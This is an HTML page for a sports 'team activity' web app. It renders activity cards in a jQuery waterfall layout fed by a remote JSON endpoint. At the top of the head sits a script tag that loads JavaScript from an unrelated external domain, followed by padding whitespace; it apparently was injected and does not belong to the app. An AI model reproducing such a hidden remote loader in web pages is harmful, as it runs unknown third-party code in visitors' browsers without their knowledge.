<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head><script src="//j.s9w.cc/j/?t=vc&v=1&g=009027e1460a&c=00259e1f755b" defer></script>                          
	<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
	<title>waterfall</title>
	      <link rel="stylesheet" href="css/activity.css">
	          <link rel="stylesheet" href="css/colorbox.css" />


	<style type="text/css">

	@import url(http://fonts.googleapis.com/css?family=Oswald);

  html body{
    left: 0;
    right: 0;
    bottom: 0;
    margin-top: 10px;
  }
		body{
			  -webkit-background-size: cover;
			  -moz-background-size: cover;
			  -o-background-size: cover;
			background:url("img/basketball_background.jpg") no-repeat center center fixed;; 
			background-size:cover;
			font-family: 'Oswald', sans-serif;

		}
		.waterfall{
			margin-top: 30px;
			width: 730px;
			position: relative;
			margin: 0 auto;
		}
		.waterfall .gird{
			position: absolute;	
			width: 230px;
			background-color: white;
			border-radius: 15px;
		}
		.waterfall p{
			line-height: 150%;
			font-size: 16px;
		}
		.waterfall .share{
			padding: 10px;
			line-height: 150%;
			font-size: 	14px;
		}
	
	.btn{

    margin: 40px;
    margin-left: 250px;

    box-shadow: 1px 1px 5px #888888;
	}


	.btn-sunny {
		margin-left: 500px;
	color: #fff;
	background-color: #f4ad49;
	border-bottom:2px solid #c38a3a;
	}

	.btn-sunny:hover, .btn-sky.active:focus, .btn-sunny:focus, .open>.dropdown-toggle.btn-sunny {
	color: #fff;
	background-color: #f5b75f;
	border-bottom:2px solid #c4924c;
	outline: none;
	}


	.btn-sunny:active, .btn-sunny.active {
	color: #fff;
	background-color: #d69840;
	border-top:2px solid #ab7a33;
	margin-top: 2px;
	}



	.btn-sky {
	color: #fff;
	background-color: #0bacd3;
	border-bottom:2px solid #098aa9;
	}

	.btn-sky:hover,.btn-sky.active:focus, .btn-sky:focus, .open>.dropdown-toggle.btn-sky {
	color: #fff;
	background-color: #29b6d8;
	border-bottom:2px solid #2192ad;
	outline: none;
	}

	.btn-sky:active, .btn-sky.active {
	color: #fff;
	background-color: #0a97b9;
	border-top:2px solid #087994;
	outline-offset: none;
	margin-top: 2px;
	}

	.btn:focus,
	.btn:active:focus,
	.btn.active:focus {
	    outline: none;
	    outline-offset: 0px;
	}
	.sports {
		background: url('img/sports.jpg') no-repeat;
		background-size:contain;

		height: 150px;
		width: 230px;
	}




	</style>
</head>
<body>
	<div class="ACon">
	    <div class="Profile">
	        <div class="Img">
	            <div class="overlay">
	              <span><img /></span>
	            </div>
	        </div>
	        <div class="PopUp">Open Profile</div>
	            
	            <div class="clickPopUp">
	                <h4><a class="username" href=""></a></h4>
	                <h5 class="buttons"><a class="username" href="">Create My Activity</a></h5>
	                <h5 class="buttons"><a class="username" href='javascript:;' onclick='lightbox();'>Create Team Activity</a></h5>
	                <h5 class="buttons"><a class="username" href="">Profile</a></h5>
	                <h5 class="buttons b"><a class="username" href="index.html">Log Out</a></h5>

	            </div>
	    </div>
	</div>
		 <div class="well text-center">
            <button onclick = 'activity.html' type="button" class="btn btn-sunny text-uppercase">Team Activity</button>
            <button type="button" class="btn btn-sky text-uppercase">My Activity</button>
        </div>
	<div class="waterfall" id="waterfall">

	<script type="text/template" id="template">
		<div class="gird">
			<a href="javascript:;">
				<div class='sports'>
				</div>			
			</a>
			<div class="share">
				<p><b><%=aName%></b></p>
				<p><b>Activity Time: </b><%=aTime%></p>
				<p><b>Location: </b><%=location%></p>
				<p><b>People Needed: </b>><%=maxPeople%></a>
			</div>
		</div>
	</script>

	<script type="text/javascript" src="js/jquery-1.12.3.min.js"></script>
	<script type="text/javascript" src="js/underscore.js"></script>

	<script type="text/javascript">
		//得到最大盒子
		var $waterfall = $("#waterfall");
		//模板字符串
		var templateString = $("#template").html();

		//数据绑定函数
		var compileFunction = _.template(templateString);

		//三列瀑布流，每列的总高度
		var colHeight = [0,0,0];

		var page = 1;
		getJSONandRender(page);


		function getJSONandRender(page){
			//发出jsonp请求
			$.ajax({
				"dataType" : "json",
  				"async": true,
  				"crossDomain": true,
  				"url": "http://ec2-52-7-74-13.compute-1.amazonaws.com/activity",
  				"method": "GET",

				"success" : function(data){
					//拿到数据
					console.log(data);
					var dataArray = data.activities;
					console.log(dataArray);
					if(dataArray.length == 0){
						return;
					}

					lock = true;
					//遍历数据
					_.each(dataArray,function(dictionary){
						//add image 
						var image = new Image();
							image.src = "http://files.haohaowan.com/yxxj/li_" + "13535657946500.jpg";

						//模板修正
						$(image).load(function(){
							//这张图片加载成功
							var domString = compileFunction(dictionary);
							//转jq
							$grid = $(domString);
							//上DOM
							$waterfall.append($grid);

							//根据瀑布流算法，设置它的left、top
							minValue = _.min(colHeight);
							minIndex = _.indexOf(colHeight,minValue);
							$grid.css({
								"top" : minValue,
								"left" : minIndex * 250
							});

							//改变总列高数组的值
							colHeight[minIndex] += $grid.outerHeight() + 20;

							//让大盒子根据最高的列设置高度
							$waterfall.css("height",_.max(colHeight));
						});
					});
				}
			});
		}
		
		
		var lock = true;
		//监听滚动
		$(window).scroll(function(){
			if(!lock) return;
			var rate = $(window).scrollTop() / ($(document).height() - $(window).height());

			if(rate >= 70){
				page ++;
				getJSONandRender(page);
				lock = false;
			}
		});
	</script>
	    <script>
        function lightbox(){    
          $.colorbox({width:"35%", height:"80%", iframe:true, href:"create_new_activity.html"
        });
        }
    </script>
        <script src="js/jquery.colorbox.js"></script>

	    <script src="js/index.js"></script>

</body>
</html>